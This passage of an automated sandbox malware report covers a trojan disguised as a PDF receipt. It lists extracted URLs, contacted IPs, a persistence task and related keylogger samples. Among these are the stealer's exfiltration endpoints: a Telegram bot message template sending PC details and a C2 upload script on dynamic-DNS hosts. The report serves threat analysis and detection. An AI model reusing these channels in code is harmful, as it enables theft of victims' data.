0000000B.00000002.4158095720.0000000003C22000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4158095720.0000000003EE9000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002C49000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4158095720.0000000003C70000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4158095720.0000000003C97000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.goodfont.co.krrDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://chrome.google.com/webstore?hl=enteXfNv.exe, 0000000B.00000002.4151393860.0000000002D04000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002C49000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://varders.kozow.com:8081rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1725618218.0000000004969000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4148166401.0000000000432000.00000040.00000400.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 00000008.00000002.1766895440.0000000004241000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002B41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.sajatypeworks.comrDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.typography.netDrDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.founder.com.cn/cn/cTherDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.galapagosdesign.com/staff/dennis.htmrDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://chrome.google.com/webstore?hl=enhrDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002C26000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallrDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4158047612.0000000003B58000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4158047612.0000000003BA2000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4158047612.0000000003CFC000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4158047612.0000000003B2D000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4158047612.0000000003CD1000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4158047612.0000000003DF5000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4158095720.0000000003BFD000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4158095720.0000000003EC4000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4158095720.0000000003C72000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4158095720.0000000003DA1000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4158095720.0000000003DCC000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4158095720.0000000003C28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://checkip.dyndns.org/qrDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1725618218.0000000004969000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4148166401.0000000000432000.00000040.00000400.00020000.00000000.sdmp, teXfNv.exe, 00000008.00000002.1766895440.0000000004241000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:116938%0D%0ADate%20arDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002B58000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002C26000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.galapagosdesign.com/DPleaserDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.office.com/hrDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002C57000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.fonts.comrDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.sandoll.co.krrDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.urwpp.deDPleaserDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.zhongyicts.com.cnrDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namerDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1724559523.00000000035B4000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 00000008.00000002.1764945738.0000000003249000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002B41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://www.sakkal.comrDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://reallyfreegeoip.org/xml/rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1725618218.0000000004969000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4148166401.0000000000432000.00000040.00000400.00020000.00000000.sdmp, teXfNv.exe, 00000008.00000002.1766895440.0000000004241000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002B91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://www.office.com/teXfNv.exe, 0000000B.00000002.4151393860.0000000002D35000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002C49000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002D26000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://www.apache.org/licenses/LICENSE-2.0rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://www.fontbureau.comrDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://checkip.dyndns.orgrDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002A71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4158047612.0000000003CF6000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002BA8000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4158047612.0000000003E19000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4158047612.0000000003D44000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4158047612.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4158047612.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4158047612.0000000003BC7000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4158095720.0000000003E14000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4158095720.0000000003DC6000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4158095720.0000000003C22000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4158095720.0000000003EE9000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002C49000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4158095720.0000000003C70000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4158095720.0000000003C97000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://api.telegram.org/bot/sendMessage?chat_id=&text=rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002B58000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002C26000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://www.carterandcone.comlrDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://chrome.google.com/webstore?hl=enlBkqrDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002C30000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002CFF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://aborters.duckdns.org:8081rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1725618218.0000000004969000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4148166401.0000000000432000.00000040.00000400.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 00000008.00000002.1766895440.0000000004241000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002B41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://www.fontbureau.com/designers/cabarga.htmlNrDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://www.founder.com.cn/cnrDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://www.fontbureau.com/designers/frere-user.htmlrDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://anotherarmy.dns.army:8081rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1725618218.0000000004969000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4148166401.0000000000432000.00000040.00000400.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 00000008.00000002.1766895440.0000000004241000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002B41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://www.jiyu-kobo.co.jp/rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://reallyfreegeoip.org/xml/8.46.123.189$rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002AEC000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002B58000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002B31000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002BBA000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002C26000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://reallyfreegeoip.orgrDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002B58000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002B31000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002C26000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://www.fontbureau.com/designers8rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://www.office.com/lBkqrDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002D30000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesrDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4158047612.0000000003B58000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4158047612.0000000003BA2000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4158047612.0000000003CFC000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4158047612.0000000003B2D000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4158047612.0000000003CD1000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4158047612.0000000003DF5000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4158095720.0000000003BFD000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4158095720.0000000003EC4000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4158095720.0000000003C72000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4158095720.0000000003DA1000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4158095720.0000000003DCC000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4158095720.0000000003C28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedrDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1725618218.0000000004969000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4148166401.0000000000432000.00000040.00000400.00020000.00000000.sdmp, teXfNv.exe, 00000008.00000002.1766895440.0000000004241000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high

                                                                                                                                    World Map of Contacted IPs

                                                                                                                                    • No. of IPs < 25%
                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                    • 75% < No. of IPs

                                                                                                                                    Public IPs

                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                    149.154.167.220
                                                                                                                                    		api.telegram.orgUnited Kingdom
                                                                                                                                    		62041TELEGRAMRUfalse
                                                                                                                                    104.21.64.1
                                                                                                                                    		reallyfreegeoip.orgUnited States
                                                                                                                                    		13335CLOUDFLARENETUSfalse
                                                                                                                                    132.226.247.73
                                                                                                                                    		checkip.dyndns.comUnited States
                                                                                                                                    		16989UTMEMUSfalse

                                                                                                                                    General Information

                                                                                                                                    Joe Sandbox version:42.0.0 Malachite
                                                                                                                                    Analysis ID:1592453
                                                                                                                                    Start date and time:2025-01-16 07:01:05 +01:00
                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                    Overall analysis duration:0h 9m 44s
                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                    Report type:full
                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                    Number of analysed new started processes analysed:16
                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                    Technologies:
                                                                                                                                    • HCA enabled
                                                                                                                                    • EGA enabled
                                                                                                                                    • AMSI enabled
                                                                                                                                    Analysis Mode:default
                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                    Sample name:rDEKONT-1_16_2025__75kb__pdf.exe
                                                                                                                                    Detection:MAL
                                                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@16/11@3/3
                                                                                                                                    EGA Information:
                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                    HCA Information:
                                                                                                                                    • Successful, ratio: 99%
                                                                                                                                    • Number of executed functions: 366
                                                                                                                                    • Number of non-executed functions: 112
                                                                                                                                    Cookbook Comments:
                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                    Warnings

                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                    • Excluded IPs from analysis (whitelisted): 184.28.90.27, 52.149.20.212, 13.107.246.45
                                                                                                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                                                                                    Simulations

                                                                                                                                    Behavior and APIs

                                                                                                                                    TimeTypeDescription
                                                                                                                                    01:01:59API Interceptor8725865x Sleep call for process: rDEKONT-1_16_2025__75kb__pdf.exe modified
                                                                                                                                    01:02:01API Interceptor12x Sleep call for process: powershell.exe modified
                                                                                                                                    01:02:04API Interceptor6087254x Sleep call for process: teXfNv.exe modified
                                                                                                                                    06:02:03Task SchedulerRun new task: teXfNv path: C:\Users\user\AppData\Roaming\teXfNv.exe

                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                    IPs

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                    149.154.167.220aASfOObWpW.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      aASfOObWpW.exeGet hashmaliciousUnknownBrowse
                                                                                                                                        Invoice No 1122207 pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          qqnal04.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                                                                            DESCRIPTION.exeGet hashmaliciousDarkCloudBrowse
                                                                                                                                              Inquiry.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                                                                                                17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                                                                                                  Company introduction.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    rDEKONT-1_15_2025__75kb__pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      https://savory-sweet-felidae-psrnd.glitch.me/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                        104.21.64.1NVIDIAShare.exe.bin.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                        • bibaprog.ru/ProviderEternallineauthmultiTrackwordpressWpDownloads.php
                                                                                                                                                        gem2.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        • securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                                                                                                                        SpCuEoekPa.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                        • www.mffnow.info/0pqe/
                                                                                                                                                        4sfN3Gx1vO.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                        • www.vilakodsiy.sbs/w7eo/
                                                                                                                                                        1162-201.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                        • www.mzkd6gp5.top/utww/
                                                                                                                                                        QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                        • www.mzkd6gp5.top/3u0p/
                                                                                                                                                        Sales Acknowledgement - HES #982323.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                        • ordrr.statementquo.com/QCbxA/
                                                                                                                                                        SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                                                                                        • adsfirm.com/administrator/index.php
                                                                                                                                                        PO2412010.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                        • www.bser101pp.buzz/v89f/
                                                                                                                                                        132.226.247.73order6566546663.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        • checkip.dyndns.org/
                                                                                                                                                        BNXCXCJSD.jseGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                        • checkip.dyndns.org/
                                                                                                                                                        NEWORDER.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                        • checkip.dyndns.org/
                                                                                                                                                        QUOTATION REQUIRED_Enatel s.r.l..exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • checkip.dyndns.org/
                                                                                                                                                        TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • checkip.dyndns.org/
                                                                                                                                                        RENH3RE2025QUOTE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                        • checkip.dyndns.org/
                                                                                                                                                        rOrders.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        • checkip.dyndns.org/
                                                                                                                                                        QUOTATION#090125-ELITEMARINE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                        • checkip.dyndns.org/
                                                                                                                                                        Order_list.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        • checkip.dyndns.org/
                                                                                                                                                        JWPRnfqs3n.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                        • checkip.dyndns.org/

                                                                                                                                                        Domains

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        reallyfreegeoip.orgJHGFDFG.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                        • 104.21.48.1
                                                                                                                                                        MV. ASL ROSE - VESSEL'S DESC.pdf.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                        • 104.21.48.1
                                                                                                                                                        New PO.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                        • 104.21.32.1
                                                                                                                                                        WOOYANG VENUS_VESSEL_PARTICULARS.doc.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                        • 104.21.64.1
                                                                                                                                                        order6566546663.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        • 104.21.48.1
                                                                                                                                                        Order Details.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        • 104.21.32.1
                                                                                                                                                        BNXCXCJSD.jseGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                        • 104.21.16.1
                                                                                                                                                        NEWORDER.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                        • 104.21.96.1
                                                                                                                                                        Invoice No 1122207 pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 104.21.112.1
                                                                                                                                                        PDF6UU0CVUO2W-YGVUIO.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                        • 104.21.96.1
                                                                                                                                                        checkip.dyndns.comJHGFDFG.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                        • 193.122.6.168
                                                                                                                                                        MV. ASL ROSE - VESSEL'S DESC.pdf.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                        • 193.122.130.0
                                                                                                                                                        New PO.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                        • 158.101.44.242
                                                                                                                                                        WOOYANG VENUS_VESSEL_PARTICULARS.doc.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                        • 132.226.8.169
                                                                                                                                                        MV Nicos Tomasos Vessel Parts.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        • 193.122.6.168
                                                                                                                                                        order6566546663.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        • 132.226.247.73
                                                                                                                                                        Order Details.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        • 193.122.6.168
                                                                                                                                                        BNXCXCJSD.jseGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                        • 132.226.247.73
                                                                                                                                                        NEWORDER.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                        • 132.226.247.73
                                                                                                                                                        Invoice No 1122207 pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 158.101.44.242
                                                                                                                                                        api.telegram.orgaASfOObWpW.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        aASfOObWpW.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        Invoice No 1122207 pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        qqnal04.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        Inquiry.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        Company introduction.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 149.154.167.220
